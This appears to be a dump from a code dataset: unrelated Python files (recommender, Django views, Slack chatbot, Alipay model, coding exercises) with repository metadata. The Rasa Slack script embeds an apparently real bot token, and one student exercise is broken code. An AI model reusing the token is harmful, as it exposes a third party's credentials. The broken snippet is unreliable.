                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='contenttypes.ContentType')),
            ],
        ),
    ]
|
[
"[email protected]"
] | |
503a11282b2b012d89e3014060423162487ba9a6
|
fec863b67ec1ae65da7111bd8c77d0ab2ef1f6ce
|
/movie recommendation system/.history/model3_20210430162616.py
|
ef78677ec57da3e3bcb5a7edf1bc1dcf42a79f03
|
[] |
no_license
|
kannan768/movie-recommendation-system
|
e6cf71620e25a0185fed3b37896137f1f39b0801
|
7460d440d44e77390e459ab10c535b6971c9c3ab
|
refs/heads/main
| 2023-05-14T02:21:50.930672 | 2021-06-09T05:02:30 | 2021-06-09T05:02:30 | 375,225,316 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,918 |
py
|
#item-item filtering
#colloborative filtering
from math import sqrt
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
from sklearn.metrics import pairwise_distances
from scipy.spatial.distance import cosine, correlation
ratings = pd.read_csv('m1-1m/ratings.dat', sep='::', names=['userId', 'movieId', 'rating', 'timestamp'],engine = 'python', encoding = 'latin-1')
users = pd.read_csv('m1-1m/users.dat', sep='::', names=['userId', 'gender', 'age', 'occupation', 'zipcode'],engine = 'python', encoding = 'latin-1')
movies = pd.read_csv('m1-1m/movies.dat', sep='::', names=['movieId', 'title', 'genres'],engine = 'python', encoding = 'latin-1')
df_movies=movies
df_ratings=ratings
df_movies_ratings=pd.merge(df_movies, df_ratings)
ratings_matrix_items = df_movies_ratings.pivot_table(index=['movieId'],columns=['userId'],values='rating').reset_index(drop=True)
ratings_matrix_items.fillna( 0, inplace = True )
movie_similarity = 1 - pairwise_distances( ratings_matrix_items.to_numpy(), metric="cosine" )
np.fill_diagonal( movie_similarity, 0 )
ratings_matrix_items = pd.DataFrame( movie_similarity )
def item_similarity(movieName):
try:
user_inp=movieName
inp=df_movies[df_movies['title']==user_inp].index.tolist()
inp=inp[0]
df_movies['similarity'] = ratings_matrix_items.iloc[inp]
df_movies.columns = ['movie_id', 'title', 'release_date','similarity']
except:
print("Sorry, the movie is not in the database!")
def recommendedMoviesAsperItemSimilarity(user_id):
user_movie= df_movies_ratings[(df_movies_ratings.userId==user_id) & df_movies_ratings.rating.isin([5,4.5])][['title']]
user_movie=user_movie.iloc[0,0]
item_similarity(user_movie)
sorted_movies_as_per_userChoice=df_movies.sort_values( ["similarity"], ascending = False )
sorted_movies_as_per_userChoice=sorted_movies_as_per_userChoice[sorted_movies_as_per_userChoice['similarity'] >=0.45]['movie_id']
recommended_movies=list()
df_recommended_item=pd.DataFrame()
user2Movies= df_ratings[df_ratings['userId']== user_id]['movieId']
for movieId in sorted_movies_as_per_userChoice:
if movieId not in user2Movies:
df_new= df_ratings[(df_ratings.movieId==movieId)]
df_recommended_item=pd.concat([df_recommended_item,df_new])
best10=df_recommended_item.sort_values(['rating'], ascending = False )[1:10]
return best10['movieId']
def movieIdToTitle(listMovieIDs):
movie_titles= list()
for id in listMovieIDs:
movie_titles.append(df_movies[df_movies['movie_id']==id]['title'])
return movie_titles
user_id=50
print("Recommended movies,:\n",movieIdToTitle(recommendedMoviesAsperItemSimilarity(user_id)))
|
[
"[email protected]"
] | |
a48974d41c1667c0b092f366d4efcc8a8d480fcd
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_248/ch119_2020_03_30_20_53_23_088219.py
|
f49b4da0a032fcc39a7720976214d6d9206f89d1
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 165 |
py
|
lista[0]*n
lista[0]=1
t=0
while t<n:
lista[t+1]=lista[t]*x/n
t+=1
def calcula_euler(lista,n):
soma_das_notas = sum(lista)
print(soma_das_notas)
|
[
"[email protected]"
] | |
57b176a71b273a1c9636c541ba74fd7a62612b4b
|
ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f
|
/PORMain/panda/direct/extensions/NurbsCurveEvaluator-extensions.py
|
86eb757f5c5e803e4e77288108ddd26264177ebb
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
BrandonAlex/Pirates-Online-Retribution
|
7f881a64ec74e595aaf62e78a39375d2d51f4d2e
|
980b7448f798e255eecfb6bd2ebb67b299b27dd7
|
refs/heads/master
| 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 799 |
py
|
"""
NurbsCurveEvaluator-extensions module: contains methods to extend
functionality of the NurbsCurveEvaluator class
"""
def getKnots(self):
"""Returns the knot vector as a Python list of floats"""
knots = []
for i in xrange(self.getNumKnots()):
knots.append(self.getKnot(i))
return knots
def getVertices(self, relTo = None):
"""Returns the vertices as a Python list of Vec4's, relative
to the indicated space if given."""
verts = []
if relTo:
for i in xrange(self.getNumVertices()):
verts.append(self.getVertex(i, relTo))
else:
for i in xrange(self.getNumVertices()):
verts.append(self.getVertex(i))
return verts
|
[
"[email protected]"
] | |
e3968b5a6ee4acfc5472f3331048077d2290fe32
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_203/78.py
|
29bc91b6b0a4fa993c5a99a015c4bc7188f4154e
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,130 |
py
|
#!/usr/bin/env python2
import itertools
def solve_row(prev_row, row):
prev_row = list(prev_row)
prev_chars = set(prev_row)
#print prev_row, row
for i, row_i in enumerate(row):
if row_i == '?':
continue
min_i = i
max_i = i
while max_i + 1 < len(prev_row) and prev_row[max_i] == prev_row[max_i + 1]:
max_i += 1
while min_i - 1 >= 0 and prev_row[min_i] == prev_row[min_i - 1] and prev_row[min_i] in prev_chars:
min_i -= 1
prev_row[min_i:max_i+1] = row_i * (max_i + 1 - min_i)
return prev_row
def solve(r, c, a):
ans = []
prev_row = ['?' for _ in a[0]]
for row in a:
if any(row_i != '?' for row_i in row):
prev_row = solve_row(prev_row, row)
break
for row in a:
prev_row = solve_row(prev_row, row)
ans.append(prev_row)
assert '?' not in prev_row
return ans
def _iter_tuples(a):
for i, row in enumerate(a):
for j, row_j in enumerate(row):
yield i, j, row_j
def _to_tuples(a):
return list(_iter_tuples(a))
def check(r, c, a, ans):
a = _to_tuples(a)
ans = _to_tuples(ans)
for (i, j, char) in a:
if char != '?':
assert (i, j, char) in ans
ptslen = 0
for char in {char for (i, j, char) in a}:
if char == '?':
continue
pts = {(i, j) for (i, j, char2) in ans if char2 == char}
ptslen += len(pts)
i_min = min(i for i, j in pts)
i_max = max(i for i, j in pts)
j_min = min(j for i, j in pts)
j_max = max(j for i, j in pts)
pts2 = {(i, j) for i in xrange(i_min, 1 + i_max) for j in xrange(j_min, 1 + j_max)}
assert pts == pts2, (char, pts2 - pts)
assert ptslen == r * c
def main():
for t in xrange(1, 1 + int(raw_input())):
print 'Case #%d:' % t
r, c = map(int, raw_input().split())
a = [list(raw_input().strip()) for _ in xrange(r)]
ans = solve(r, c, a)
check(r, c, a, ans)
for row in ans:
print ''.join(row)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
fc17c5d9f4350ec9d4472375aea8d04b216e0ed2
|
4eee308593cb45abdfedecb3c80438584504cfed
|
/trainerbid/trainer/views.py
|
5b3fc9ef17ac3b580db1810124e186237d388ea7
|
[] |
no_license
|
sikha-jayanth/Trainer-Bidding
|
46ffb94f1af1a83f322e2b7cf1ff167e6c7150ee
|
fe43e6e9781d0da51a2805b7fbfb7b1dbb9b1af5
|
refs/heads/main
| 2023-01-21T01:13:38.866317 | 2020-11-30T22:16:30 | 2020-11-30T22:16:30 | 317,160,150 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,793 |
py
|
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import User
from django.shortcuts import render, redirect
from trainer.forms import RegistrationForm, PersonProfileForm, ApplicationForm, FilterApplicationForm
from django.contrib import messages
from institute.models import Requirements
from trainer.models import Application
from django.contrib.auth.decorators import login_required
from django.forms import forms
# Create your views here.
from trainer.models import PersonProfile
def trainerRegistration(request):
form = RegistrationForm()
context = {}
context["form"] = form
if request.method == 'POST':
form = RegistrationForm(request.POST)
if form.is_valid():
form.save()
return redirect("login")
else:
context["form"] = form
return render(request, "trainer/registration.html", context)
return render(request, "trainer/registration.html", context)
def trainerLogin(request):
if request.method == 'POST':
uname = request.POST.get('uname')
pwd = request.POST.get('pwd')
user = authenticate(request, username=uname, password=pwd)
if user is not None:
login(request, user)
return redirect("trainerhome")
else:
messages.info(request, 'invalid credentials!')
return render(request, "trainer/login.html")
return render(request, "trainer/login.html")
@login_required(login_url='login')
def trainerHome(request):
return render(request, 'trainer/trainerhome.html')
@login_required(login_url='login')
def trainerLogout(request):
logout(request)
return redirect("login")
@login_required(login_url='login')
def trainerProfile(request):
context = {}
user = User.objects.get(username=request.user)
fname = user.first_name
lname = user.last_name
fullname = fname + " " + lname
email = user.email
form = PersonProfileForm(initial={'user': request.user, 'name': fullname, 'email': email})
context["form"] = form
if request.method == 'POST':
form = PersonProfileForm(request.POST)
if form.is_valid():
form.save()
return redirect("viewprofile")
else:
context["form"] = form
return render(request, "trainer/createprofile.html", context)
return render(request, "trainer/createprofile.html", context)
@login_required(login_url='login')
def viewProfile(request):
profile = PersonProfile.objects.get(user=request.user)
context = {}
context["profile"] = profile
return render(request, "trainer/viewprofile.html", context)
@login_required(login_url='login')
def updateProfile(request):
profile = PersonProfile.objects.get(user=request.user)
form = PersonProfileForm(instance=profile)
context = {}
context["form"] = form
if request.method == 'POST':
form = PersonProfileForm(instance=profile, data=request.POST)
if form.is_valid():
form.save()
return redirect("viewprofile")
else:
context["form"] = form
return render(request, "trainer/updateprofile.html", context)
return render(request, "trainer/updateprofile.html", context)
@login_required(login_url='login')
def matchingJobs(request):
context = {}
profile = PersonProfile.objects.get(user=request.user)
skill = profile.skill
requirements = Requirements.objects.filter(skill_needed=skill)
context["requirements"] = requirements
return render(request, "trainer/listjobs.html", context)
@login_required(login_url='login')
def applyJob(request, pk):
context = {}
profile = PersonProfile.objects.get(user=request.user)
job = Requirements.objects.get(id=pk)
form = ApplicationForm(
initial={'jobid': job.jobid, 'job_title': job.job_title, 'location': job.location, 'user': request.user,
'name': profile.name,
'skill': profile.skill, 'years_of_experience': profile.years_of_experience,
'qualification': profile.qualification, 'cgpa': profile.cgpa, 'email': profile.email,
'phone': profile.phone})
context["form"] = form
if request.method == 'POST':
form = ApplicationForm(request.POST)
if form.is_valid():
form.save()
return render(request, "trainer/msgapplied.html")
else:
context["form"] = form
return render(request, "trainer/applyjob.html", context)
return render(request, "trainer/applyjob.html", context)
@login_required(login_url='login')
def viewApplications(request):
context = {}
form = FilterApplicationForm()
context["form"] = form
queryset = Application.objects.filter(user=request.user)
count = queryset.count()
context["count"] = count
context["applications"] = queryset
return render(request, "trainer/viewapplications.html", context)
@login_required(login_url='login')
def filterApplications(request):
context = {}
form = FilterApplicationForm()
context["form"] = form
if request.method == 'POST':
form = FilterApplicationForm(request.POST)
if form.is_valid():
status = form.cleaned_data['status']
queryset = Application.objects.filter(status=status, user=request.user)
count = queryset.count()
context["applications"] = queryset
context["count"] = count
return render(request, "trainer/viewapplications.html", context)
else:
context["form"] = form
return render(request, "trainer/viewapplications.html", context)
return render(request, "trainer/viewapplications.html", context)
|
[
"[email protected]"
] | |
2f147c1641f843f833516ed9c68321409fb72dac
|
84c4474a88a59da1e72d86b33b5326003f578271
|
/saleor/graphql/checkout/mutations/checkout_language_code_update.py
|
2da8f5d51c6bdb4c3a5fd72b4babc3f0f2d1e657
|
[
"BSD-3-Clause"
] |
permissive
|
vineetb/saleor
|
052bd416d067699db774f06453d942cb36c5a4b7
|
b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9
|
refs/heads/main
| 2023-07-20T02:01:28.338748 | 2023-07-17T06:05:36 | 2023-07-17T06:05:36 | 309,911,573 | 0 | 0 |
NOASSERTION
| 2020-11-04T06:32:55 | 2020-11-04T06:32:55 | null |
UTF-8
|
Python
| false | false | 2,360 |
py
|
import graphene
from saleor.webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.descriptions import ADDED_IN_34, DEPRECATED_IN_3X_INPUT
from ...core.doc_category import DOC_CATEGORY_CHECKOUT
from ...core.enums import LanguageCodeEnum
from ...core.mutations import BaseMutation
from ...core.scalars import UUID
from ...core.types import CheckoutError
from ...core.utils import WebhookEventInfo
from ...plugins.dataloaders import get_plugin_manager_promise
from ..types import Checkout
from .utils import get_checkout
class CheckoutLanguageCodeUpdate(BaseMutation):
checkout = graphene.Field(Checkout, description="An updated checkout.")
class Arguments:
id = graphene.ID(
description="The checkout's ID." + ADDED_IN_34,
required=False,
)
token = UUID(
description=f"Checkout token.{DEPRECATED_IN_3X_INPUT} Use `id` instead.",
required=False,
)
checkout_id = graphene.ID(
required=False,
description=(
f"The ID of the checkout. {DEPRECATED_IN_3X_INPUT} Use `id` instead."
),
)
language_code = graphene.Argument(
LanguageCodeEnum, required=True, description="New language code."
)
class Meta:
description = "Update language code in the existing checkout."
doc_category = DOC_CATEGORY_CHECKOUT
error_type_class = CheckoutError
error_type_field = "checkout_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.CHECKOUT_UPDATED,
description="A checkout was updated.",
)
]
@classmethod
def perform_mutation( # type: ignore[override]
cls,
_root,
info: ResolveInfo,
/,
*,
checkout_id=None,
id=None,
language_code,
token=None
):
checkout = get_checkout(cls, info, checkout_id=checkout_id, token=token, id=id)
checkout.language_code = language_code
checkout.save(update_fields=["language_code", "last_change"])
manager = get_plugin_manager_promise(info.context).get()
cls.call_event(manager.checkout_updated, checkout)
return CheckoutLanguageCodeUpdate(checkout=checkout)
|
[
"[email protected]"
] | |
426c5e0d5a83f6df17a3d005e7214aa7f8ce9038
|
189d79c0e0fcdce192a6034306416fd492202501
|
/LeetCode/Python/306 Additive Number.py
|
c7806ee6c106e36c199ee794f0ded80b76622235
|
[] |
no_license
|
digant0705/Algorithm
|
294fbc84eaa4b6e0ea864924b71c4773c2e1c0c6
|
01f04bcc5e8f55014973d4eef069245f3f663eb9
|
refs/heads/master
| 2021-07-25T16:44:34.366974 | 2021-06-05T23:37:17 | 2021-06-05T23:37:17 | 251,144,249 | 0 | 0 | null | 2020-03-29T22:05:29 | 2020-03-29T22:05:28 | null |
UTF-8
|
Python
| false | false | 1,981 |
py
|
# -*- coding: utf-8 -*-
'''
Additive Number
===============
Additive number is a string whose digits can form additive sequence.
A valid additive sequence should contain at least three numbers. Except for the
first two numbers, each subsequent number in the sequence must be the sum of
the preceding two.
For example:
"112358" is an additive number because the digits can form an additive
sequence: 1, 1, 2, 3, 5, 8.
1 + 1 = 2, 1 + 2 = 3, 2 + 3 = 5, 3 + 5 = 8
"199100199" is also an additive number, the additive sequence is:
1, 99, 100, 199.
1 + 99 = 100, 99 + 100 = 199
Note: Numbers in the additive sequence cannot have leading zeros, so sequence
1, 2, 03 or 1, 02, 3 is invalid.
Given a string containing only digits '0'-'9', write a function to determine
if it's an additive number.
Follow up:
How would you handle overflow for very large input integers?
'''
import collections
class Solution(object):
'''算法思路:
前两个数字固定,那么就可以判断整个序列,所以枚举前两个不同的数字即可
'''
def add(self, a, b):
i, j, carry, r = len(a) - 1, len(b) - 1, 0, collections.deque()
while i >= 0 or j >= 0:
carry, mod = divmod(
(int(a[i]) if i >= 0 else 0) +
(int(b[j]) if j >= 0 else 0) + carry, 10)
r.appendleft(mod)
i -= 1
j -= 1
if carry:
r.appendleft(carry)
return ''.join(map(str, r))
def check(self, a, b, num):
if not num:
return True
sum = self.add(a, b)
if num.startswith(sum):
return self.check(b, sum, num[len(sum):])
return False
def isAdditiveNumber(self, num):
return any(
self.check(num[:i + 1], num[i + 1:j + 1], num[j + 1:])
for i in xrange(len(num) - 2)
for j in xrange(i + 1, len(num) - 1)
)
s = Solution()
print s.isAdditiveNumber("11")
|
[
"[email protected]"
] | |
d06c40ecaf072a5bad0a3bfcdf2cff9f0960317d
|
ccb4cb8358fb896a88bbf0c6771462d898d7a492
|
/examples/goce_reentry_chart.py
|
decf8f0416fb3a95317f8d7eb65579f41c578074
|
[
"MIT"
] |
permissive
|
skyfielders/python-skyfield
|
a30d34a680dcd285bc8cd39cedc2629f792d5821
|
61fb6324e312715e20aa75ec24dc87286442be1a
|
refs/heads/master
| 2023-08-31T13:10:32.863587 | 2023-08-10T14:25:56 | 2023-08-10T14:25:56 | 7,924,113 | 1,040 | 204 |
MIT
| 2023-08-28T19:44:50 | 2013-01-30T21:19:21 |
Python
|
UTF-8
|
Python
| false | false | 2,026 |
py
|
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.dates import HourLocator, DateFormatter
from skyfield.api import load, EarthSatellite
# Labels for both date and hour on the x axis, and km on y.
def label_dates_and_hours(axes):
axes.xaxis.set_major_locator(HourLocator([0]))
axes.xaxis.set_minor_locator(HourLocator([0, 6, 12, 18]))
axes.xaxis.set_major_formatter(DateFormatter('0h\n%Y %b %d\n%A'))
axes.xaxis.set_minor_formatter(DateFormatter('%Hh'))
for label in ax.xaxis.get_ticklabels(which='both'):
label.set_horizontalalignment('left')
axes.yaxis.set_major_formatter('{x:.0f} km')
axes.tick_params(which='both', length=0)
# Load the satellite's final TLE entry.
sat = EarthSatellite(
'1 34602U 09013A 13314.96046236 .14220718 20669-5 50412-4 0 930',
'2 34602 096.5717 344.5256 0009826 296.2811 064.0942 16.58673376272979',
'GOCE',
)
# Build the time range `t` over which to plot, plus other values.
ts = load.timescale()
t = ts.tt_jd(np.arange(sat.epoch.tt - 2.0, sat.epoch.tt + 2.0, 0.005))
reentry = ts.utc(2013, 11, 11, 0, 16)
earth_radius_km = 6371.0
# Compute geocentric positions for the satellite.
g = sat.at(t)
valid = [m is None for m in g.message]
# Start a new figure.
fig, ax = plt.subplots()
# Draw the blue curve.
x = t.utc_datetime()
y = np.where(valid, g.distance().km - earth_radius_km, np.nan)
ax.plot(x, y)
# Label the TLE epoch.
x = sat.epoch.utc_datetime()
y = sat.at(sat.epoch).distance().km - earth_radius_km
ax.plot(x, y, 'k.')
ax.text(x, y - 9, 'Epoch of TLE data ', ha='right')
# Label the official moment of reentry.
x = reentry.utc_datetime()
y = sat.at(reentry).distance().km - earth_radius_km
ax.plot(x, y, 'r.')
ax.text(x, y + 6, ' Moment of re-entry', c='r')
# Grid lines and labels.
ax.grid(which='both')
ax.set(title='GOCE satellite: altitude above sea level', xlabel='UTC')
label_dates_and_hours(ax)
# Render the plot to a PNG file.
fig.savefig('goce-reentry.png', bbox_inches='tight')
|
[
"[email protected]"
] | |
be938368f2fbe8f503a6259a20e3e9714ac29b5c
|
5af4b89949a703bcc53bdc25a19a5ff079817cce
|
/papermerge/core/models/folder.py
|
00f6881892ed5ee47048c385c945b3f38b07f4ff
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
0xpointer42/papermerge
|
4b176a865ffa3044605844406fecd3ac5f3c5657
|
9bea16e96d460d00229e813f7063e45bfd07b4e2
|
refs/heads/master
| 2022-09-09T09:18:56.596921 | 2020-06-02T15:45:11 | 2020-06-02T15:45:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 658 |
py
|
from django.utils.translation import ugettext_lazy as _
from papermerge.core import mixins
from papermerge.core.models.kvstore import KVNode
from papermerge.core.models.node import BaseTreeNode
from papermerge.search import index
class Folder(mixins.ExtractIds, BaseTreeNode):
search_fields = [
index.SearchField('title'),
index.SearchField('text', partial_match=True, boost=2),
index.SearchField('notes')
]
@property
def kv(self):
return KVNode(instance=self)
class Meta:
verbose_name = _("Folder")
verbose_name_plural = _("Folders")
def __str__(self):
return self.title
|
[
"[email protected]"
] | |
29d64bfeff13d2d620664beeb544713fc033e990
|
614d5ec96dcd9c6bb7a4384ea5420a7757c43d34
|
/examples/checkable.py
|
3bb79a1ddb3669a679ec3b68eab1e3c9bd9625ce
|
[
"MIT"
] |
permissive
|
githeshuai/dayu_widgets_tag
|
52ae4816addd58505b6bbd0e4cd12f931df89e95
|
f843e8f100b698af74353ec7595c26213574bc15
|
refs/heads/master
| 2023-04-05T10:04:03.726767 | 2021-04-01T16:02:42 | 2021-04-01T16:02:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,032 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################
# Author: Mu yanru
# Date : 2019.8
# Email : [email protected]
###################################################################
from dayu_widgets_tag import MCheckableTag
from dayu_widgets.qt import QWidget, QHBoxLayout, QApplication, Slot
from dayu_widgets import dayu_theme, MLabel
@dayu_theme.deco
class Checkable(QWidget):
def __init__(self, parent=None):
super(Checkable, self).__init__(parent)
label = MLabel('Categories:')
topic_lay = QHBoxLayout()
topic_lay.addWidget(label)
for i in ['Movies', 'Books', 'Music', 'Sports']:
topic_lay.addWidget(MCheckableTag(text=i))
topic_lay.addStretch()
main_lay = QHBoxLayout()
main_lay.addLayout(topic_lay)
self.setLayout(main_lay)
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
test = Checkable()
test.show()
sys.exit(app.exec_())
|
[
"[email protected]"
] | |
d89cfb8f0978fc0bca985f2f530f9406acc32058
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2465/60631/246241.py
|
f35f636406a4f9cd9aa0b1ec54ba471016376403
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 158 |
py
|
si = input()
li = si.split(',')
out = []
for i in range(len(li)):
p = len(li)-1-i
h = li[p]
if i < int(h):
out.append(i+1)
print(max(out))
|
[
"[email protected]"
] | |
9ec8dfb6896bd3defa4e777b809942f49b4b449d
|
3f597d5c1363f1f6f77764bcdb864167c3e51795
|
/qwapp/defaults.py
|
ac08eacd7647f3441469ca0c64e9eeeb3df07f45
|
[] |
no_license
|
mbr/qwapp
|
558c58b47398abcaca41b1814c7b5e8363b8eaf0
|
44fa2ecefcb61d2fb5c2280d30af2b1140f3f03b
|
refs/heads/master
| 2023-06-06T20:48:59.776375 | 2013-06-06T01:46:49 | 2013-06-06T01:46:49 | 1,467,990 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 637 |
py
|
WIKI_NAME = 'qwapp Wiki'
REPOSITORY_PATH = './wiki'
DEBUG = True
SECRET_KEY = 'development key'
# use password.py to generate
PASSWORD_HASH = '06ab2f79d3fb9d86c75f0bb981c95f5d68497b311bdb1ed32918717547b4a6c31017a7a04908c6d39a93c8f748e312d5bfd255cbfbf15530cf374c1861dc73a7' # "devpass"
CACHE_TYPE = 'simple' # set this to 'null' to disable or use memcached, or others
#CACHE_MEMCACHED_SERVERS = ['localhost:11211']
CACHE_THRESHOLD = 200
CACHE_DEFAULT_TIMEOUT = 50 # 50 seconds default cache timeout
CACHE_KEY_PREFIX = PASSWORD_HASH[:10]
# no plugins loaded by default
PLUGINS = ['headershift','wikilinks']
PLUGIN_HEADERSHIFT_LEVEL = 1
|
[
"[email protected]"
] | |
3042812bdbd8a115621ce18b49ec5776b9227138
|
3b9d763180410bf0abf5b9c37391a64319efe839
|
/toontown/town/TTTownLoader.py
|
0780028cd0ae5e5b0b03c022cae3ac05115db2fc
|
[] |
no_license
|
qphoton/Reverse_Engineering_Project_ToonTown
|
442f15d484324be749f6f0e5e4e74fc6436e4e30
|
11468ab449060169191366bc14ff8113ee3beffb
|
refs/heads/master
| 2021-05-08T00:07:09.720166 | 2017-10-21T02:37:22 | 2017-10-21T02:37:22 | 107,617,661 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 869 |
py
|
# File: T (Python 2.4)
import TownLoader
import TTStreet
from toontown.suit import Suit
class TTTownLoader(TownLoader.TownLoader):
def __init__(self, hood, parentFSM, doneEvent):
TownLoader.TownLoader.__init__(self, hood, parentFSM, doneEvent)
self.streetClass = TTStreet.TTStreet
self.musicFile = 'phase_3.5/audio/bgm/TC_SZ.mid'
self.activityMusicFile = 'phase_3.5/audio/bgm/TC_SZ_activity.mid'
self.townStorageDNAFile = 'phase_5/dna/storage_TT_town.dna'
def load(self, zoneId):
TownLoader.TownLoader.load(self, zoneId)
Suit.loadSuits(1)
dnaFile = 'phase_5/dna/toontown_central_' + str(self.canonicalBranchZone) + '.dna'
self.createHood(dnaFile)
def unload(self):
Suit.unloadSuits(1)
TownLoader.TownLoader.unload(self)
|
[
"[email protected]"
] | |
3459de3607f81b8e3cd2943b8031dbd163d4b650
|
1268030197a27bf2ef5e3f5ab8df38993457fed5
|
/run_bot.py
|
552b71c22140a9c5e5e54878a65f05870a32fd77
|
[] |
no_license
|
parimalpate123/rasa_slack_chatbot
|
439abd9a541d6314b46c6fb303c0275803fc9357
|
206aacab62f12be9df9f009f65736caed3e8edac
|
refs/heads/master
| 2020-04-17T14:13:49.917604 | 2019-05-07T11:08:07 | 2019-05-07T11:08:07 | 166,649,129 | 0 | 1 | null | 2019-01-29T11:09:07 | 2019-01-20T10:32:59 |
Python
|
UTF-8
|
Python
| false | false | 1,112 |
py
|
#import json
from rasa_core.channels.slack import SlackInput
from rasa_core.agent import Agent
from rasa_core.interpreter import RegexInterpreter
from rasa_core.channels import HttpInputChannel
#from rasa_core.utils import EndpointConfig
# load your trained agent
#agent = Agent.load(models\current\dialogue, interpreter=RegexInterpreter())
agent = Agent.load('models/current/dialogue', interpreter='models/current/nlu')
#action_endpoint = EndpointConfig(url="http://localhost:5055/webhook")
input_channel = \
SlackInput(slack_token='xoxb-525465834114-525382855891-SYt6HyWl7IfVyhtX19z6jJec'
, slack_channel='@devops') # this is the `bot_user_o_auth_access_token`
# the name of your channel to which the bot posts (optional)
# set serve_forever=True if you want to keep the server running
#agent.handle_channel(HttpInputChannel(5004, "/chat", input_channel))
agent.handle_channel(HttpInputChannel(5004, "", input_channel))
#s = agent.handle_channels([input_channel], 5004, serve_forever=False)
#agent.handle_channels([input_channel], 5004, serve_forever=True)
|
[
"[email protected]"
] | |
14b577ec46ee9d7038f9abbef96019ef6af5fd26
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/RiskFinishLabel.py
|
70510d2ed4724524faa93b6970839d177175fd54
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 1,630 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class RiskFinishLabel(object):
def __init__(self):
self._code = None
self._label = None
self._path = None
@property
def code(self):
return self._code
@code.setter
def code(self, value):
self._code = value
@property
def label(self):
return self._label
@label.setter
def label(self, value):
self._label = value
@property
def path(self):
return self._path
@path.setter
def path(self, value):
self._path = value
def to_alipay_dict(self):
params = dict()
if self.code:
if hasattr(self.code, 'to_alipay_dict'):
params['code'] = self.code.to_alipay_dict()
else:
params['code'] = self.code
if self.label:
if hasattr(self.label, 'to_alipay_dict'):
params['label'] = self.label.to_alipay_dict()
else:
params['label'] = self.label
if self.path:
if hasattr(self.path, 'to_alipay_dict'):
params['path'] = self.path.to_alipay_dict()
else:
params['path'] = self.path
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = RiskFinishLabel()
if 'code' in d:
o.code = d['code']
if 'label' in d:
o.label = d['label']
if 'path' in d:
o.path = d['path']
return o
|
[
"[email protected]"
] | |
0c5e81e31f3423a12125f91838a1aa195b0987ba
|
ca47ebf432f787e0ae78a54afcd3c60d0af2d476
|
/GitProgs/152002016_PythonLabCode1_R_Parnika_Murty/Q2.py
|
1bd4495f446a8e5de2c579c00a17269c90c17d39
|
[] |
no_license
|
Parnika1102/My_Assignments
|
0659c70f8f8473107b49a611ee9d16823331c535
|
b0ecf3df0107c627944f5ef98f72996efdf42f37
|
refs/heads/master
| 2023-03-20T11:37:02.821148 | 2021-03-10T12:14:45 | 2021-03-10T12:14:45 | 344,998,848 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 949 |
py
|
#!/bin/python3
#Class Polygon with attributes numsides and area.
class Polygon:
#__init__() constructor.
def __init__(self,numSides,area):
#The class attributes "numSides" and "area".
self.numSides = numSides
self.area = area
#For the string representation of our object.
def __str__(self):
#To display error message if number of sides is less than 3.
if self.numSides<3 :
raise Exception("Number of sides should be atleast 3")
#To display error message if polygon has negative area.
elif self.area<0 :
